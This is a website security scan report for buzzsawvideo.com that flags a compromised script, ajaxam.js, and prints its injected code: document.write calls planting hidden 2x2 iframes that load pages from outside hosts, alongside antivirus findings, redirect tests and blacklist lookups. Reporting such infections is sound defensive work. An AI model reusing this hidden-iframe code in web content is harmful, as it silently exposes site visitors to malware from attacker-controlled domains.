Scanned pages/files
Request | Server response | Status |
http://buzzsawvideo.com/ | 200 OK Content-Length: 121 Content-Type: text/html | clean |
http://www.buzzsawvideo.com/aspnet_client/ajaxam.js | 200 OK Content-Length: 469 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe src="http://niu-sae.com/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://widelyranginginterests.com/mhes.html></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ifuturo.net/hams.html?i=1050644></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://niu-sae.com/stats.php <iframe src="http://niu-sae.com/stats.php" name="twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"> Hidden iFrame found. size: 2x2 src: http://ifuturo.net/hams.html?i=1050644 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ifuturo.net/hams.html?i=1050644> Hidden iFrame found. The same iFrame was found in 31 websites. size: 2x2 src: http://widelyranginginterests.com/mhes.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://widelyranginginterests.com/mhes.html> | ||
http://buzzsawvideo.com/test404page.js | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: buzzsawvideo.com
Result:
HTTP/1.1 200 OK
Date: Thu, 17 Jul 2014 21:46:11 GMT
Server: Microsoft-IIS/7.0
Content-Length: 121
Content-Type: text/html
X-Powered-By: ASP.NET
...121 bytes of data.
GET / HTTP/1.1
Host: buzzsawvideo.com
Result:
HTTP/1.1 200 OK
Date: Thu, 17 Jul 2014 21:46:11 GMT
Server: Microsoft-IIS/7.0
Content-Length: 121
Content-Type: text/html
X-Powered-By: ASP.NET
...121 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: buzzsawvideo.com
Referer: http://www.google.com/search?q=buzzsawvideo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: buzzsawvideo.com
Referer: http://www.google.com/search?q=buzzsawvideo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=buzzsawvideo.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://buzzsawvideo.com/
Result: buzzsawvideo.com is not infected or malware details are not published yet.
Result: buzzsawvideo.com is not infected or malware details are not published yet.